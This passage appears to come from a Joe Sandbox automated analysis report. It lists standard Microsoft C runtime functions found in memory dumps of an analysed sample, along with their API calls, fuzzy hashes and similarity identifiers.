                                                                                                          • String ID:
                                                                                                          • API String ID: 590220429-0
                                                                                                          • Opcode ID: 7e41fb7b7d20bbed0b720fdbf19dffeca7514504fd5640546fc4cfdd1370b471
                                                                                                          • Instruction ID: cca8b3b8b7eb68fdc9c3cbe504dd1e3fc49f4626728dc9cbcf524023bfc25315
                                                                                                          • Opcode Fuzzy Hash: 7e41fb7b7d20bbed0b720fdbf19dffeca7514504fd5640546fc4cfdd1370b471
                                                                                                          • Instruction Fuzzy Hash: 9A21AE75841349EFEB92AFB8C98076D37A0AF02329F114782D4305B1E1DBB9B9518BB5
                                                                                                          Function 6FDD2713 Relevance: 13.6, APIs: 9, Instructions: 54synchronizationCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast_errno$CloseCodeExitHandleObjectProcessSingleWait__doserrno_dosmaperr
                                                                                                          • String ID:
                                                                                                          • API String ID: 4235994010-0
                                                                                                          • Opcode ID: 4ce387739b2917e9ecedaceff79002681a2271e207c2b3545a5615512d21f28a
                                                                                                          • Instruction ID: bb793f77a8de08412e64b29ed7184ae1bf88679ffbfb46000284ceeb31a68eba
                                                                                                          • Opcode Fuzzy Hash: 4ce387739b2917e9ecedaceff79002681a2271e207c2b3545a5615512d21f28a
                                                                                                          • Instruction Fuzzy Hash: 48012D75504715FBD7A05F758C84A4A7BACAF0737AB144316F8398B2D0DB34B8418BA1
                                                                                                          Function 00D013DC Relevance: 13.5, APIs: 9, Instructions: 45COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DecodePointer.KERNEL32(00D022F8,00000014,00D0148A,?), ref: 00D013F4
                                                                                                          • _onexit.MSVCR100(?), ref: 00D01401
                                                                                                          • _lock.MSVCR100(00000008), ref: 00D0140C
                                                                                                          • DecodePointer.KERNEL32 ref: 00D0141C
                                                                                                          • DecodePointer.KERNEL32 ref: 00D01427
                                                                                                          • EncodePointer.KERNEL32(?,?,?), ref: 00D0143D
                                                                                                          • __dllonexit.MSVCR100(00000000), ref: 00D01440
                                                                                                          • EncodePointer.KERNEL32(?), ref: 00D0144E
                                                                                                          • EncodePointer.KERNEL32(?), ref: 00D01458
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612452283.0000000000D01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D00000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612359297.0000000000D00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30612550523.0000000000D02000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30612649247.0000000000D04000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_d00000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Pointer$DecodeEncode$__dllonexit_lock_onexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 3085583964-0
                                                                                                          • Opcode ID: 5a8b971a6ef76a0edadc078b28ef8bcac0af808f16f574c78da9e8c491eba70e
                                                                                                          • Instruction ID: d0ec82cdab29bfdf821296d56c2cee437ee2118f7a43586642f1d1750d6db249
                                                                                                          • Opcode Fuzzy Hash: 5a8b971a6ef76a0edadc078b28ef8bcac0af808f16f574c78da9e8c491eba70e
                                                                                                          • Instruction Fuzzy Hash: F901E275C11218AEDB01AFA4EC45BED7AB9FB48321F544226E418E22B0DB758A049FB0
                                                                                                          Function 6FDCE8AF Relevance: 13.5, APIs: 9, Instructions: 44COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(?,?,00000000,00000000), ref: 6FDCE8BC
                                                                                                          • _errno.MSVCR100(?,?,00000000,00000000), ref: 6FDCE8C3
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,00000000,00000000), ref: 6FDCE8CD
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,?,00000000,00000000), ref: 6FDCE8E2
                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000), ref: 6FDCE8ED
                                                                                                          • _dosmaperr.MSVCR100(00000000,?,00000000,00000000), ref: 6FDCE8F4
                                                                                                          • _errno.MSVCR100(?,00000000,00000000), ref: 6FDCE8FA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$AttributesErrorFileLast__doserrno_dosmaperr_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 1181389587-0
                                                                                                          • Opcode ID: be8ff0a7299e834cfc92c5f746a484b0edbb48c42a53485a254fd94b6c4a23d8
                                                                                                          • Instruction ID: f9761d78e37f130403ec9f6c5bc1fc4fb73d1dca9ce3e53a56888c88ddf5e94c
                                                                                                          • Opcode Fuzzy Hash: be8ff0a7299e834cfc92c5f746a484b0edbb48c42a53485a254fd94b6c4a23d8
                                                                                                          • Instruction Fuzzy Hash: E00186B0445319DADBD22F78C90679D3BA89F42378F014215F8644F1D0DB34B8428BA2
                                                                                                          Function 6FD823DB Relevance: 13.5, APIs: 9, Instructions: 44COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$__doserrno$AttributesErrorFileLast_dosmaperr_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 4291834686-0
                                                                                                          • Opcode ID: fd1a496e93417c354ecd3294ebd6f81e298e5e3d17b15e0b3963deeccc62517e
                                                                                                          • Instruction ID: 2a9172af20ef90bc72380d5f711b823e9392aebd58b3ccd03e5eb2024b30f8e7
                                                                                                          • Opcode Fuzzy Hash: fd1a496e93417c354ecd3294ebd6f81e298e5e3d17b15e0b3963deeccc62517e
                                                                                                          • Instruction Fuzzy Hash: B001AD70040328EAD7926FB8D90979D3760AF023B8F024226E9348F1E4DB35B4428BB0
                                                                                                          Function 6FDCC59C Relevance: 13.5, APIs: 9, Instructions: 34threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __set_flsgetvalue.MSVCR100 ref: 6FDCC5A2
                                                                                                            • Part of subcall function 6FD80341: TlsGetValue.KERNEL32(?,6FD80713), ref: 6FD8034A
                                                                                                          • __get_tlsindex.MSVCR100 ref: 6FDCC5A7
                                                                                                          • ___fls_getvalue@4.MSVCR100(00000000), ref: 6FDCC5AD
                                                                                                            • Part of subcall function 6FDCC6AA: TlsGetValue.KERNEL32(?), ref: 6FDCC6B8
                                                                                                          • __get_tlsindex.MSVCR100(?), ref: 6FDCC5BA
                                                                                                          • ___fls_setvalue@8.MSVCR100(00000000,?), ref: 6FDCC5C0
                                                                                                            • Part of subcall function 6FDCC6CA: DecodePointer.KERNEL32(?,?), ref: 6FDCC6DB
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCC5C9
                                                                                                          • ExitThread.KERNEL32 ref: 6FDCC5D0
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6FDCC5D6
                                                                                                          • _freefls.MSVCR100(?), ref: 6FDCC5F6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ThreadValue__get_tlsindex$CurrentDecodeErrorExitLastPointer___fls_getvalue@4___fls_setvalue@8__set_flsgetvalue_freefls
                                                                                                          • String ID:
                                                                                                          • API String ID: 1636594015-0
                                                                                                          • Opcode ID: fc6c4a2ad05b0efaf859a15df2e99b1f1d5a7076dff38e8e27be41064681672a
                                                                                                          • Instruction ID: 7c179e03eb0ffa287f7d99e9d5543c69ea65d9c4367135c64ea8083a95e49cdd
                                                                                                          • Opcode Fuzzy Hash: fc6c4a2ad05b0efaf859a15df2e99b1f1d5a7076dff38e8e27be41064681672a
                                                                                                          • Instruction Fuzzy Hash: ECF096754007C0EFD745EF71C64881E3BECAF453583148514EA458B261DB34F842CBB2
                                                                                                          Function 6FDD9FB9 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 234COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _get_daylight.MSVCR100(?,?,?,00000000,?,?,?,?,?,6FDA7E43,?,?,?), ref: 6FDDA0D0
                                                                                                          • _get_dstbias.MSVCR100(?,?,?,00000000,?,?,?,?,?,6FDA7E43,?,?,?), ref: 6FDDA0E2
                                                                                                          • _get_timezone.MSVCR100(?,?,?,00000000,?,?,?,?,?,6FDA7E43,?,?,?), ref: 6FDDA0F4
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?,?,6FDA7E43,?,?), ref: 6FDDA1FC
                                                                                                            • Part of subcall function 6FDFAF2C: GetCurrentProcess.KERNEL32(C0000417), ref: 6FDFAF42
                                                                                                            • Part of subcall function 6FDFAF2C: TerminateProcess.KERNEL32(00000000), ref: 6FDFAF49
                                                                                                          • _errno.MSVCR100(?,?,00000000,?,?,?,?,?,6FDA7E43,?,?,?,?,?,?,000000FF), ref: 6FDDA201
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CurrentTerminate_errno_get_daylight_get_dstbias_get_timezone_invoke_watson
                                                                                                          • String ID: ;$;
                                                                                                          • API String ID: 305590698-2543639521
                                                                                                          • Opcode ID: 8e4330eaf520168b1f22caed886c0954a82a1f6339cdde582dca4e847fbcce36
                                                                                                          • Instruction ID: 94fe3fff56423b215839fb7dbb8100604250d660c61224db6050ce5051b36e47
                                                                                                          • Opcode Fuzzy Hash: 8e4330eaf520168b1f22caed886c0954a82a1f6339cdde582dca4e847fbcce36
                                                                                                          • Instruction Fuzzy Hash: 5F718EB1A0031A9BDB44DFA9CC81BDE77FAAF49324F14812AF514E7291E731F9048B60
                                                                                                          Function 6FD8667A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • memset.MSVCR100(00000000,00000000,00000090,00000083,00000001,000000BC,?,6FD86D45,?,00000001,00000000,00000000,00000005), ref: 6FD8668E
                                                                                                          • strncpy_s.MSVCR100(00000080,00000010,00000001,0000000F,00000000,00000000,00000005), ref: 6FD92886
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memsetstrncpy_s
                                                                                                          • String ID: _.,
                                                                                                          • API String ID: 388526945-2709443920
                                                                                                          • Opcode ID: c30df80dcaab132e44bd71bb141587c6fffd3ba923bb8ab3b4f6e4669016f655
                                                                                                          • Instruction ID: 6d6eda8aafc712d60482a87ea50158d8a0540b685ea072712f620c655e2a0709
                                                                                                          • Opcode Fuzzy Hash: c30df80dcaab132e44bd71bb141587c6fffd3ba923bb8ab3b4f6e4669016f655
                                                                                                          • Instruction Fuzzy Hash: B53125F2149346EDEBA04F348E09FDA375DDF023ECF00591AF9AB9A081D731B5008659
                                                                                                          Function 6FDDC308 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                                                                          • String ID: P
                                                                                                          • API String ID: 2819658684-3110715001
                                                                                                          • Opcode ID: 8d24361130e1c7c7f239276ebd7c079275cef1ef6a29c025b795dfb819a636ad
                                                                                                          • Instruction ID: ee3d0aebcad437cd81f4a5a9dbcbe1ce3276a5530da7c12fbf7f0d2250ceac09
                                                                                                          • Opcode Fuzzy Hash: 8d24361130e1c7c7f239276ebd7c079275cef1ef6a29c025b795dfb819a636ad
                                                                                                          • Instruction Fuzzy Hash: A231617194038AEBCBA0EFACC88499E77B4BF05328F10465AF8709B1D0E771B9529791
                                                                                                          Function 6FD82049 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDA9333
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDA933E
                                                                                                          • _errno.MSVCR100(?), ref: 6FDA934B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDA9356
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                                          • String ID: B
                                                                                                          • API String ID: 2959964966-1255198513
                                                                                                          • Opcode ID: 00e56be36c84b8f22193484a8bc7fce3b5b6aa9f23332866910c348321c3eac7
                                                                                                          • Instruction ID: 80be7c2608a45e22cb1a4ba1071f4e3bdcdff830b92d1a8fa4e83d14afeb3223
                                                                                                          • Opcode Fuzzy Hash: 00e56be36c84b8f22193484a8bc7fce3b5b6aa9f23332866910c348321c3eac7
                                                                                                          • Instruction Fuzzy Hash: B9315E71804619DFDF409FB8C8804EEB7B4FF09329F10461AE930A71D4D77AA945DBA6
                                                                                                          Function 6FDD6496 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD64B4
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD64BF
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDD64DB
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD64E6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID: B
                                                                                                          • API String ID: 1328987296-1255198513
                                                                                                          • Opcode ID: 0f9948778847d28e98107d5f9a4cc464e3e0d8234ac858835d39f89858b655e7
                                                                                                          • Instruction ID: a293551140d142f3b4c6461de7e162232ae0c2572c802cd7a507ea7b2a71a894
                                                                                                          • Opcode Fuzzy Hash: 0f9948778847d28e98107d5f9a4cc464e3e0d8234ac858835d39f89858b655e7
                                                                                                          • Instruction Fuzzy Hash: 20214F71C0421DDADB919FA8C8405EE77B8AF06324B14072AF530A71D4E735F8858BF1
                                                                                                          Function 6FD84605 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                                          • String ID: B
                                                                                                          • API String ID: 2959964966-1255198513
                                                                                                          • Opcode ID: ff1a993ed8e990dabf0d09198eedf9df876bb93acd3a4b6caeba9926699d340c
                                                                                                          • Instruction ID: e528c5535952615f341b3b34a45916e0beccc461e03015cd85c62fb36e035fd7
                                                                                                          • Opcode Fuzzy Hash: ff1a993ed8e990dabf0d09198eedf9df876bb93acd3a4b6caeba9926699d340c
                                                                                                          • Instruction Fuzzy Hash: DE21517290425ADFDF409FE4C8419EE77B8FB09324F140627E931A71C0D779A9058BB5
                                                                                                          Function 6FD98495 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 48COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _getptd$CreateFrameInfo
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 4181383844-1018135373
                                                                                                          • Opcode ID: 2130badc3f2c1e61f9927a7c2a64d4235fa426f1700c8edaea12da926a5932fc
                                                                                                          • Instruction ID: 9b39dd612e1562e9355742f7fbd4772e794b01f904add0c3c711d19bf0e892be
                                                                                                          • Opcode Fuzzy Hash: 2130badc3f2c1e61f9927a7c2a64d4235fa426f1700c8edaea12da926a5932fc
                                                                                                          • Instruction Fuzzy Hash: 6101AD35801B00CFC7A09F70D848BA9B7B4BF00B68F10546AD65ACB261EB30F445CFA0
                                                                                                          Function 6FDD4447 Relevance: 12.2, APIs: 8, Instructions: 246COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _fileno.MSVCR100(00000000,?,?,?,?,6FDD47D5,00000000,6FDD4800,00000010,6FDD3CD9,00000000), ref: 6FDD4467
                                                                                                          • _lseeki64.MSVCR100(00000000,00000000,00000000,00000001,?,?,?,?,6FDD47D5,00000000,6FDD4800,00000010,6FDD3CD9,00000000), ref: 6FDD4484
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _fileno_lseeki64
                                                                                                          • String ID:
                                                                                                          • API String ID: 335342929-0
                                                                                                          • Opcode ID: c8283867e1c4848209a756840094970e9ae0fc7ae999b29e202ca5a4f8de1647
                                                                                                          • Instruction ID: 12b1410929a8c0ae872f594f6cf382cba840f61be71fc56aa4a1267dbb1e5798
                                                                                                          • Opcode Fuzzy Hash: c8283867e1c4848209a756840094970e9ae0fc7ae999b29e202ca5a4f8de1647
                                                                                                          • Instruction Fuzzy Hash: B5A1DE30A04394EBEBA5CB28CD80BD9B7B2BF46314F0481D9E599AB195D7B4B9C1CF50
                                                                                                          Function 6FDF2902 Relevance: 12.1, APIs: 8, Instructions: 146COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?), ref: 6FDF2928
                                                                                                          • _isleadbyte_l.MSVCR100(?,?,?,?,?), ref: 6FDF29B4
                                                                                                          • _errno.MSVCR100(?,?,?), ref: 6FDF2A50
                                                                                                          • _errno.MSVCR100(?,?,?), ref: 6FDF2A6B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDF2933
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100(?,?), ref: 6FDF2953
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?), ref: 6FDF295E
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?), ref: 6FDF2A76
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo$_invalid_parameter_isleadbyte_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 4220014359-0
                                                                                                          • Opcode ID: f4486a7ba85e4303839511196e35b3cc33f16bb011729089c6fd8c3a6775a061
                                                                                                          • Instruction ID: 47a94847cd905c89eeb78687db9531a0eda3277367a12fa8df2a4ac1e4155374
                                                                                                          • Opcode Fuzzy Hash: f4486a7ba85e4303839511196e35b3cc33f16bb011729089c6fd8c3a6775a061
                                                                                                          • Instruction Fuzzy Hash: 3A51D7718463C9DFCF51CFA4C4509ED7BB0EF0531AF1281AAD8A06B251D330BA42DBA1
                                                                                                          Function 6FDC8289 Relevance: 12.1, APIs: 8, Instructions: 111synchronizationthreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,32054ECC), ref: 6FDC82CB
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC82D9
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC82F2
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000), ref: 6FDC8301
                                                                                                          • memset.MSVCR100(?,00000000,0000000C), ref: 6FDC8367
